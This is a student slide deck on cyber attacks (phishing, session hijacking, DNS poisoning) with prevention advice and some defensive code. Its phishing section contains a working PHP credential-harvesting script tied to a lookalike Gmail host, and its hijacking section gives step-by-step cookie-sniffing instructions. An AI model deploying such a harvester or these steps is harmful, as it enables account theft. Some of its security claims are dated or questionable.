ATTACKS ON THE
CYBER WORLD
BY:
NIKHIL TRIPATHI(12MCMB10)
TARUN MEHROTRA(12MCMB11)
SUDHIR KUMAR PANDEY(12MCMB14)
FLOW OF CONTENTS
• INTRODUCTION
• TYPES OF ATTACKS
• SOCIAL ENGINEERING
• PHISHING
• SESSION HIJACKING
• DNS SPOOFING
• CONCLUSION
• REFERENCES
INTRODUCTION
“A threat where weapons are computers- the most destructive weapon
on the planet.” - Kevin Mitnick
• Internet users grew by 528.1% over 2000-2011.
• 85% of business and government agencies detected security breaches.
• The FBI estimates that the United States loses up to $10 billion a year to
cyber crime.
• In India, 30 million people fell victim to cyber crime last year, resulting
in a loss of Rs 34,110 crore annually.
• Being addicted to the Internet, only one question should arise in our
minds:
HOW SECURE ARE WE?
VARIOUS ATTACKS
•Hackers practice hundreds of exploits, more or less, against
individual hosts or even whole networks.
•Some of the most popular and dangerous attacks are:
> SESSION HIJACKING (SNIFFING).
> PHISHING.
> DOS ATTACK (SMURFING).
> DNS POISONING (DNS SPOOFING).
> SQL INJECTION.
> FAKE EMAILING AND EMAIL BOMBING.
> TROJAN HORSES, KEYLOGGERS and many more…
SOCIAL ENGINEERING
•The art of manipulating people into performing actions or divulging
confidential information.
•An art of DECEPTION.
•Varies from purely technical to purely non-technical.
•Depends upon the victim’s cyber knowledge.
•Depends upon the extent to which the attacker spoofs their identity.
•A result of people’s unawareness of cyber crimes.
•The starting point of almost all cyber attacks practiced nowadays.
•One of the most dangerous and most effective techniques.
•PHISHING is an example of technical social engineering.
PHISHING
•The act of attempting to acquire information such as usernames and
passwords by masquerading as a trustworthy entity in an electronic
communication.
•Started in the late 90s.
•Named after the earlier hackers, known as phreakers…
•Still the most effective and most dangerous social-engineering attack.
•The overall cost of online fraud by phishing reached $3 billion in
2007.
•In 2011, it reached a peak of $94 billion.
•The main reason for the growth in phishing scams is users’ unawareness.
PHISHING (contd.)
HOW IT WORKS?
Components of phishing are:
•A fake page
•A PHP script to redirect the user to the original page containing some
notifications
•The redirected original page along with some notification
•The generated text file holding the username and password
SCREENSHOTS FOR
PHISHING DEMO
Working (contd.)
•Change the redirected URL to the URL of the PHP file and make sure that both the
fake page and the PHP script are present within the same directory.
•Change the method from POST to GET.
•PHP code:
<?php
header("Location: http://gmaiil.t35.com/ServiceLoginAuth.htm");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
HOW TO PREVENT
PHISHING?
1. The most basic check is to look for the lock beside the URL field of the browser.
2. Check the URL.
3. Check the certificate issued to the company by the authorized party, e.g.
Thawte Consulting in the case of Google.
4. If possible, enter the IP address for gmail.com instead of the domain
name. It is time-consuming, but far more secure against phishing and DNS
poisoning.
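Checks 1 and 2 can be partly automated. The Python sketch below is an added example, not part of the original slides: it classifies the host a URL really points at against an assumed allowlist (TRUSTED) and flags near-miss spellings such as the gmaiil host used in the PHP redirect shown earlier. The allowlist, the distance threshold and the sample URLs are constructed for illustration.

```python
from urllib.parse import urlsplit

# Assumed allowlist of hosts the user really logs in to (constructed).
TRUSTED = ("accounts.google.com", "gmail.com", "google.com")
# Brand labels derived from the allowlist: ["gmail", "google"].
BRANDS = sorted({host.split(".")[-2] for host in TRUSTED})


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, computed one row at a time."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                # delete from a
                           cur[j - 1] + 1,             # insert into a
                           prev[j - 1] + (ca != cb)))  # substitute
        prev = cur
    return prev[-1]


def classify(url: str) -> str:
    """Return a verdict for the host that the browser would connect to."""
    try:
        parts = urlsplit(url)
        host = (parts.hostname or "").lower().rstrip(".")
    except ValueError:
        return "invalid"
    if not host:
        return "invalid"
    # "https://accounts.google.com@evil.example/" connects to evil.example:
    # everything before "@" is userinfo, not the host.
    if parts.username is not None:
        return "userinfo-trick"
    if host in TRUSTED or host.endswith(tuple("." + t for t in TRUSTED)):
        # The lock icon only means something on a host that is itself trusted.
        return "trusted" if parts.scheme == "https" else "trusted-host-no-tls"
    for label in host.split("."):
        if label.startswith("xn--"):
            return "punycode-review"  # IDN label, may render as a homoglyph
        for brand in BRANDS:
            # Distance 0 covers "gmail.com.login.example"; 1 covers "gmaiil".
            if edit_distance(label, brand) <= 1:
                return "lookalike:" + brand
    return "unknown"


if __name__ == "__main__":
    samples = (  # constructed sample URLs
        "https://accounts.google.com/ServiceLogin",
        "http://gmaiil.t35.com/ServiceLoginAuth.htm",
        "https://gmail.com.login.example/",
        "https://accounts.google.com@evil.example/login",
    )
    for sample in samples:
        print(f"{classify(sample):22} {sample}")
```

A distance threshold of 1 also flags innocent labels such as "mail", so a lookalike verdict is a prompt for review, not proof of phishing.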
But what if it is combined with other attacks?
SESSION HIJACKING
•Refers to the theft of a magic cookie used to authenticate a user
to a remote server.
•Some basic methods to implement the attack: session fixation, cross-site
scripting and, the most popular one, session sidejacking.
•Started in 2004 and spread among hackers like wildfire.
•American national agencies faced million-dollar losses due to this attack.
•Falls into the category of the deadliest attacks because of the huge
losses it causes.
•Can be implemented by first capturing the packets and then analyzing them.
•Cain & Abel is popular for capturing and APR, and Wireshark/Ettercap are
popular for analyzing the packets.
HOW IT WORKS?
1. Applicable only if a LAN is used to access the internet.
2. The victim accesses the internet through the default gateway.
3. An attacker sitting on the same network captures the packets going from
the victim’s machine to the default gateway and vice versa.
4. After capturing, the attacker analyzes the packets and reads the cookies.
5. Next, the attacker copies those cookies and sets them in his/her browser.
6. That’s it. Now the attacker gets access to the user’s account.
WORKING(contd.)
SCREENSHOTS FOR
SESSION HIJACKING
HOW TO PREVENT SESSION
HIJACKING?
1. If possible, never use any shared network to access your accounts.
2. Otherwise, log out every few seconds, but that seems impossible.
3. The best way is for web servers to use time-stamped cookies, but this is
still somewhat in the testing phase.
4. Otherwise, use HTTPS to encrypt the traffic.
But what if the attacker intentionally downgrades your HTTPS connection to
HTTP?
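On the server side, the sidejacking and downgrade exposure described above shows up in the response headers. The Python audit below is an added example, not part of the original slides: it reports session cookies sent without Secure or HttpOnly, cookies that outlive an assumed limit (MAX_SESSION_SECONDS), and HTTPS responses that lack Strict-Transport-Security, the header that tells browsers to refuse a later downgrade to HTTP. The header sets and the cookie name SID are constructed samples.

```python
MAX_SESSION_SECONDS = 3600  # assumed policy limit for a session cookie


def parse_set_cookie(value):
    """Split one Set-Cookie value into (name, {attribute: value})."""
    first, *rest = [part.strip() for part in value.split(";")]
    name = first.partition("=")[0].strip()
    attrs = {}
    for part in rest:
        key, _, val = part.partition("=")
        if key.strip():
            attrs[key.strip().lower()] = val.strip()
    return name, attrs


def hsts_max_age(value):
    """Return the max-age of a Strict-Transport-Security value, or 0."""
    for part in value.split(";"):
        key, _, val = part.strip().partition("=")
        val = val.strip().strip('"')
        if key.strip().lower() == "max-age" and val.isdigit():
            return int(val)
    return 0


def audit_response(scheme, headers):
    """headers is a list of (name, value) pairs from one HTTP response."""
    findings = []
    hsts = [v for k, v in headers if k.lower() == "strict-transport-security"]
    if scheme != "https":
        # Everything, cookies included, is readable on a shared LAN.
        findings.append(("transport", "plain-http"))
    elif not hsts or hsts_max_age(hsts[0]) <= 0:
        # Without HSTS the browser will follow a downgrade to http://.
        findings.append(("transport", "no-hsts"))
    for key, value in headers:
        if key.lower() != "set-cookie":
            continue
        name, attrs = parse_set_cookie(value)
        if "secure" not in attrs:
            findings.append((name, "no-secure"))    # sent over HTTP too
        if "httponly" not in attrs:
            findings.append((name, "no-httponly"))  # readable by page scripts
        max_age = attrs.get("max-age", "")
        if max_age.isdigit() and int(max_age) > MAX_SESSION_SECONDS:
            findings.append((name, "long-lived"))   # stolen copy stays valid
    return findings


# Constructed sample responses.
SHARED_LAN = ("http", [
    ("Content-Type", "text/html"),
    ("Set-Cookie", "SID=abc123; Path=/; Max-Age=2592000"),
])
HTTPS_NO_HSTS = ("https", [
    ("Set-Cookie", "SID=abc123; Path=/; HttpOnly"),
])
HARDENED = ("https", [
    ("Strict-Transport-Security", "max-age=31536000; includeSubDomains"),
    ("Set-Cookie", "SID=abc123; Path=/; Secure; HttpOnly; Max-Age=900"),
])

if __name__ == "__main__":
    for label, (scheme, headers) in (("shared LAN", SHARED_LAN),
                                     ("https, no HSTS", HTTPS_NO_HSTS),
                                     ("hardened", HARDENED)):
        print(label, audit_response(scheme, headers))
```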
DNS POISONING
•An attack where the victim’s machine is fooled and redirected to some other
server rather than the desired server.
•Also called DNS spoofing.
•The attacker poisons the DNS cache entry so that it starts giving false results.
•Cain & Abel can be used for this purpose through a MAN-IN-THE-MIDDLE
attack.
•Because DNS is an insecure protocol, any host can resolve the query generated
by a user.
HOW IT WORKS?
HOW TO PREVENT DNS
POISONING?
•The only way to prevent DNS poisoning is to make this protocol a secure
one. Research is still going on in this field under the umbrella of Verisign Inc.
•The new protocol will be named DNSSEC (Domain Name System Security
Extension).
•http://verisigninc.com is the only domain we have found so far that is
DNSSEC-enabled.
•DNSSEC-enabled packets are larger (> 512 bytes) than traditional DNS
packets.
•DNSSEC will generate more TCP traffic.
•DNSSEC requires support for EDNS0.
•Thus, a huge change will be required before DNSSEC implementation.
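The three wire-level points above (messages over 512 bytes, EDNS0, more TCP) fit together in one DNS query. The Python sketch below is an added example, not part of the original slides: it builds a query carrying the EDNS0 OPT record with the "DNSSEC OK" bit, reads back the UDP size it advertises, and decides from a response header whether to retry over TCP or whether the resolver reports the answer as validated. The transaction id, the 1232-byte UDP size and the sample responses are constructed.

```python
import struct

TYPE_A, TYPE_OPT, CLASS_IN = 1, 41, 1
FLAG_QR, FLAG_TC, FLAG_RD, FLAG_RA, FLAG_AD = 0x8000, 0x0200, 0x0100, 0x0080, 0x0020
CLASSIC_UDP_LIMIT = 512  # largest UDP DNS message when no EDNS0 is offered
DO_BIT = 0x8000          # "DNSSEC OK" flag inside the OPT record's TTL field


def encode_name(name):
    """Encode a host name as length-prefixed labels ending in a zero byte."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def build_query(name, txid=0x1234, edns=True, udp_size=1232):
    """Build an A query; with edns=True append an OPT record with DO set."""
    header = struct.pack("!HHHHHH", txid, FLAG_RD, 1, 0, 0, 1 if edns else 0)
    message = header + encode_name(name) + struct.pack("!HH", TYPE_A, CLASS_IN)
    if edns:
        # OPT pseudo-record: root name, TYPE 41, CLASS reused for the UDP
        # payload size, TTL reused for flags, empty RDATA.
        message += struct.pack("!BHHIH", 0, TYPE_OPT, udp_size, DO_BIT, 0)
    return message


def read_opt(message):
    """Return the OPT settings of a message, or None if it has no OPT record.

    This sketch only walks messages made of questions plus one additional
    record, which is the shape build_query() produces.
    """
    qdcount, ancount, nscount, arcount = struct.unpack("!HHHH", message[4:12])
    if ancount or nscount or not arcount:
        return None
    pos = 12
    for _ in range(qdcount):
        while message[pos]:          # skip each label of the question name
            pos += 1 + message[pos]
        pos += 5                     # terminating zero + QTYPE + QCLASS
    root, rtype, udp_size, ttl, _ = struct.unpack("!BHHIH", message[pos:pos + 11])
    if root != 0 or rtype != TYPE_OPT:
        return None
    return {"udp_size": udp_size, "dnssec_ok": bool(ttl & DO_BIT)}


def max_udp_response(query):
    """Largest UDP answer a server may send back for this query."""
    opt = read_opt(query)
    return opt["udp_size"] if opt else CLASSIC_UDP_LIMIT


def next_step(response):
    """Decide what a stub resolver should do with a response header."""
    if len(response) < 12:
        return "malformed"
    flags = struct.unpack("!H", response[2:4])[0]
    if not flags & FLAG_QR:
        return "not-a-response"
    if flags & FLAG_TC:
        return "retry-over-tcp"      # answer did not fit in the UDP size
    if (flags & 0x000F) == 2:
        return "servfail"            # validating resolvers answer this for bogus data
    # AD only says the resolver validated; it is trustworthy only if the
    # path to that resolver is.
    return "validated-by-resolver" if flags & FLAG_AD else "unvalidated"


def sample_response(flags, name="verisigninc.com"):
    """Constructed header-plus-question response used as sample input."""
    return (struct.pack("!HHHHHH", 0x1234, flags, 1, 0, 0, 0)
            + encode_name(name) + struct.pack("!HH", TYPE_A, CLASS_IN))


SAMPLE_TRUNCATED = sample_response(FLAG_QR | FLAG_RD | FLAG_RA | FLAG_TC)
SAMPLE_VALIDATED = sample_response(FLAG_QR | FLAG_RD | FLAG_RA | FLAG_AD)
SAMPLE_PLAIN = sample_response(FLAG_QR | FLAG_RD | FLAG_RA)

if __name__ == "__main__":
    query = build_query("verisigninc.com")
    print(len(query), read_opt(query), max_udp_response(query))
    for sample in (SAMPLE_TRUNCATED, SAMPLE_VALIDATED, SAMPLE_PLAIN):
        print(next_step(sample))
```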
CONCLUSION
•Many attacks are being practiced on the internet all around the globe.
•Alongside these attacks, there are some mechanisms to protect against
them.
•But these mechanisms are not enough to secure us against all the possibilities.
•The day is not far off when the two important components of the Internet
will be DNSSEC and IPv6 rather than DNS and IPv4. At that time, maybe, we
can say that the internet is now secure.
•But what to do until that day? How to be completely secure in this cyber
world?
•Till then, the only answer one can think of is:
STAY AWAY FROM INTERNET!!!
It’s not the proper answer, but at least it’s true…
REFERENCES
•http://firewall.cx
•http://social-engineer.org
•http://hackforums.net
•http://defcon.org
•http://networkworld.com
•http://verisigninc.com
•http://stackoverflow.com
•http://sessionhijack.com
THANK YOU…

Mattingly "AI & Prompt Design: The Basics of Prompt Design"
 
Advanced Views - Calendar View in Odoo 17
Advanced Views - Calendar View in Odoo 17Advanced Views - Calendar View in Odoo 17
Advanced Views - Calendar View in Odoo 17
 
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in DelhiRussian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
 

Attacks on the cyber world

  • 1. ATTACKS ON THE CYBER WORLD BY: NIKHIL TRIPATHI(12MCMB10) TARUN MEHROTRA(12MCMB11) SUDHIR KUMAR PANDEY(12MCMB14 )
  • 2. FLOW OF CONTENTS
      • INTRODUCTION
      • TYPES OF ATTACKS
      • SOCIAL ENGINEERING
      • PHISHING
      • SESSION HIJACKING
      • DNS SPOOFING
      • CONCLUSION
      • REFERENCES
  • 4. INTRODUCTION
      “A threat where weapons are computers- the most destructive weapon on the planet.” - Kevin Mitnick
      • 528.1% is the growth rate of internet users over 2000-2011.
      • 85% of business and government agencies detected security breaches.
      • The FBI estimates that the United States loses up to $10 billion a year to cyber crime.
      • In India, 30 million people fell victim to cyber crime last year, resulting in an annual loss of Rs 34,110 crore.
      • Being addicted to the Internet, only one question should arise in our minds:
      HOW SECURE ARE WE?
  • 5. VARIOUS ATTACKS
      • Hackers practice hundreds of exploits, more or less, against individual hosts or even whole networks.
      • Some of the most popular and dangerous attacks are:
          > SESSION HIJACKING (SNIFFING).
          > PHISHING.
          > DOS ATTACK (SMURFING).
          > DNS POISONING (DNS SPOOFING).
          > SQL INJECTION.
          > FAKE EMAILING AND EMAIL BOMBING.
          > TROJAN HORSES, KEYLOGGERS and many more.
  • 6. SOCIAL ENGINEERING
      • The art of manipulating people into performing actions or divulging confidential information.
      • An art of DECEPTION.
      • Varies from purely technical to purely non-technical.
      • Depends upon the victim’s cyber knowledge.
      • Depends upon the extent to which the attacker spoofs their identity.
      • A result of people’s unawareness of cyber crime.
      • The starting point of almost all the cyber attacks practiced nowadays.
      • One of the most dangerous and most effective techniques.
      • PHISHING is an example of technical social engineering.
  • 7. PHISHING
      • The act of attempting to acquire information such as usernames and passwords by masquerading as a trustworthy entity in an electronic communication.
      • Started in the late 90s.
      • Named after the earlier hackers, known as phreakers.
      • Still the most effective and most dangerous social-engineering attack.
      • The overall cost of online fraud by phishing reached $3 billion in 2007.
      • In 2011, it reached a peak of $94 billion.
      • The main reason for the growth in phishing scams is users’ unawareness.
  • 9. HOW IT WORKS?
      Components of phishing are:
      • A fake page
      • A PHP script to redirect the user to the original page containing some notifications
      • The redirected original page along with some notification
      • The generated text file holding the username and password
  • 12. Working (contd.)
      • Change the redirected URL to the URL of the PHP file, and make sure that both the fake page and the PHP script are present within the same directory.
      • Change the method from POST to GET.
      • PHP code:
          <?php
          // Send the browser on to the follow-up page.
          header("Location: http://gmaiil.t35.com/ServiceLoginAuth.htm");
          // Append each submitted field as name=value to a text file.
          $handle = fopen("passwords.txt", "a");
          foreach ($_GET as $variable => $value) {
              fwrite($handle, $variable);
              fwrite($handle, "=");
              fwrite($handle, $value);
              fwrite($handle, "\r\n");
          }
          fwrite($handle, "\r\n");
          fclose($handle);
          exit;
          ?>
  • 15. HOW TO PREVENT PHISHING?
      1. The most basic thing is to look for the lock beside the URL field of the browser.
      2. Check the URL.
      3. Check the certificate issued to the company by the authorized party, e.g. Thawte Consulting in the case of Google.
      4. If possible, enter the IP address for gmail.com instead of the domain name. It is time-consuming but far more secure against phishing and DNS poisoning.
      But what if it is combined with other attacks?
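The "check the URL" step can be automated. The following is an added example, not part of the original slides: it compares the host of a login URL with an allow-list and flags near-miss spellings such as the `gmaiil` host seen in the slides. The allow-list, the brand list and the function names are assumptions made for illustration.

```python
from urllib.parse import urlsplit

# Assumptions: hosts users are expected to log in to, and the brand
# labels that a lookalike would try to imitate.
TRUSTED_HOSTS = ("gmail.com", "mail.google.com", "accounts.google.com")
BRANDS = ("gmail", "google")

def edit_distance(a, b):
    """Levenshtein distance, computed one row at a time."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # deletion
                           cur[j - 1] + 1,              # insertion
                           prev[j - 1] + (ca != cb)))   # substitution
        prev = cur
    return prev[-1]

def classify_login_url(url, max_distance=1):
    """Return (verdict, reason) for a URL that is about to receive credentials."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower().rstrip(".")
    if host in TRUSTED_HOSTS:
        if parts.scheme == "https":
            return "ok", "exact trusted host over https"
        return "insecure", "trusted host, but over plain http"
    # Not on the allow-list: does any label copy or nearly copy a brand?
    for label in host.split("."):
        for brand in BRANDS:
            if edit_distance(label, brand) <= max_distance:
                return "lookalike", f"'{label}' resembles '{brand}' on {host}"
    return "untrusted", "host is not on the allow-list"
```

The similarity test is only a triage signal and will also flag harmless labels such as `mail`; the allow-list is what decides whether a host is trusted.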
  • 16. SESSION HIJACKING
      • Refers to the theft of the magic cookie that authenticates a user to a remote server.
      • Some basic methods of implementing the attack: session fixation, cross-site scripting and, the most popular one, session sidejacking.
      • Started in 2004 and spread among hackers like wildfire.
      • American national agencies faced million-dollar losses due to this attack.
      • Falls into the category of the deadliest attacks because of the huge losses it causes.
      • Can be implemented by first capturing the packets and then analyzing them.
      • Cain & Abel is popular for capturing and APR, and Wireshark/Ettercap is popular for analyzing the packets.
  • 17. HOW IT WORKS?
      1. Applicable only if a LAN is used for accessing the internet.
      2. The victim accesses the internet through the default gateway.
      3. An attacker sitting in the same network captures the packets going from the victim’s machine to the default gateway and vice versa.
      4. After capturing, the attacker analyzes the packets and reads the cookies.
      5. Next, the attacker copies those cookies and sets them in his/her browser.
      6. That’s it. Now he’ll get access to the user’s account.
  • 24. HOW TO PREVENT SESSION HIJACKING?
      1. If possible, never use any shared network to access your accounts.
      2. Otherwise, log out every few seconds, though that seems impossible.
      3. The best way is for web servers to use time-stamped cookies, but this is still somewhat in a testing phase.
      4. Otherwise, use HTTPS to encrypt the traffic.
      But what if the attacker intentionally downgrades your HTTPS connection to HTTP?
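On the server side, both the sniffing risk and the downgrade question above come down to a few response headers. The following is an added example, not part of the original slides: it audits one response for session cookies that lack `Secure` or `HttpOnly` and for a missing `Strict-Transport-Security` header. The function names and the two sample responses are constructed for illustration.

```python
def parse_set_cookie(value):
    """Split a Set-Cookie value into (cookie name, {attribute: value})."""
    first, *rest = [part.strip() for part in value.split(";")]
    attrs = {}
    for part in rest:
        if part:
            key, _, val = part.partition("=")
            attrs[key.strip().lower()] = val.strip()
    return first.partition("=")[0], attrs

def hsts_max_age(value):
    """Return max-age from a Strict-Transport-Security value, 0 if unusable."""
    for directive in value.split(";"):
        key, _, val = directive.strip().partition("=")
        if key.lower() == "max-age" and val.strip('"').isdigit():
            return int(val.strip('"'))
    return 0

def audit_response(scheme, headers):
    """Return a list of (subject, finding) for one response's headers."""
    findings, hsts = [], None
    if scheme != "https":
        findings.append(("transport", "plain HTTP: cookies readable on the LAN"))
    for name, value in headers:
        lname = name.lower()
        if lname == "strict-transport-security":
            hsts = hsts_max_age(value)
        elif lname == "set-cookie":
            cookie, attrs = parse_set_cookie(value)
            if "secure" not in attrs:
                findings.append((cookie, "no Secure: also sent over HTTP"))
            if "httponly" not in attrs:
                findings.append((cookie, "no HttpOnly: readable by page scripts"))
    # Browsers honour HSTS only when it arrives over HTTPS.
    if scheme == "https" and not hsts:
        findings.append(("transport", "no usable HSTS: HTTPS can be downgraded"))
    return findings

# Constructed sample responses (not captured traffic).
WEAK = [("Content-Type", "text/html"), ("Set-Cookie", "SID=3f9a; Path=/")]
HARDENED = [("Set-Cookie", "SID=3f9a; Path=/; Secure; HttpOnly; SameSite=Lax"),
            ("Strict-Transport-Security", "max-age=31536000; includeSubDomains")]
```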
  • 25. DNS POISONING
      • An attack where the victim’s machine gets fooled and redirected to some other server rather than the desired server.
      • Also called DNS spoofing.
      • The attacker poisons the DNS cache entry so that it starts giving false results.
      • Cain & Abel can be used for this purpose by means of a MAN-IN-THE-MIDDLE attack.
      • Because DNS is an insecure protocol, any host can resolve the query generated by a user.
  • 27. HOW TO PREVENT DNS POISONING?
      • The only way to prevent DNS poisoning is by making this protocol a secure one. Research is still going on in this field under the umbrella of Verisign Inc.
      • The new protocol will be named DNSSEC (Domain Name System Security Extension).
      • http://verisigninc.com is the only domain so far that we found to be DNSSEC-enabled.
      • DNSSEC-enabled packets are larger (> 512 bytes) than traditional DNS packets.
      • DNSSEC will generate more TCP traffic.
      • DNSSEC requires support for EDNS0.
      • Thus, a huge change will be required before DNSSEC implementation.
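The link between the 512-byte limit, EDNS0 and DNSSEC is visible in the query itself. The following is an added example, not part of the original slides: it builds a DNS query with and without the EDNS0 OPT record and reads back the UDP size and DO (DNSSEC OK) bit that the query announces. The function names are illustrative, and the parser assumes uncompressed names, as in the queries built here.

```python
import struct

CLASSIC_UDP_LIMIT = 512   # largest UDP response accepted without EDNS0
OPT = 41                  # RR type of the EDNS0 pseudo-record (RFC 6891)

def encode_name(name):
    """Encode a domain name as length-prefixed labels ending in the root label."""
    labels = [l.encode("ascii") for l in name.rstrip(".").split(".") if l]
    return b"".join(bytes([len(l)]) + l for l in labels) + b"\x00"

def build_query(name, qtype, edns=True, udp_size=4096, dnssec_ok=True, txid=0x1234):
    """Build a DNS query; with edns=True an OPT record is appended."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 1 if edns else 0)
    question = encode_name(name) + struct.pack("!HH", qtype, 1)  # class IN
    if not edns:
        return header + question
    # OPT: root name, TYPE=41, CLASS carries the UDP payload size,
    # TTL carries ext-rcode, version and the DO bit (0x8000), RDLENGTH=0.
    ttl = 0x8000 if dnssec_ok else 0
    return header + question + b"\x00" + struct.pack("!HHIH", OPT, udp_size, ttl, 0)

def advertised_limits(query):
    """Return (max UDP response size, DO bit) that a query announces."""
    qdcount, ancount, nscount, arcount = struct.unpack("!HHHH", query[4:12])
    if ancount or nscount:
        raise ValueError("expected a query without answer/authority records")
    pos = 12
    for _ in range(qdcount):          # skip each question: name, type, class
        while query[pos]:
            pos += 1 + query[pos]
        pos += 1 + 4
    for _ in range(arcount):          # walk the additional section
        while query[pos]:
            pos += 1 + query[pos]
        pos += 1
        rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", query[pos:pos + 10])
        if rtype == OPT:
            return rclass, bool(ttl & 0x8000)
        pos += 10 + rdlen
    return CLASSIC_UDP_LIMIT, False
```

A query without the OPT record limits the reply to 512 bytes over UDP, so a signed answer that does not fit is truncated and retried over TCP.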
  • 29. CONCLUSION
      • Many attacks are being practiced on the internet all around the globe.
      • Along with these attacks, there are some mechanisms for staying secure against them.
      • But these mechanisms are not enough to secure us against all the possibilities.
      • The day is not far off when the two important components of the Internet will be DNSSEC and IPv6 rather than DNS and IPv4. At that time, maybe, we can say that the internet is now secure.
      • But what to do until that day? How to be completely secure in this cyber world?
      • Till then, the only answer one can think of is:
      STAY AWAY FROM INTERNET!!!
      It’s not the proper answer, but at least it’s true.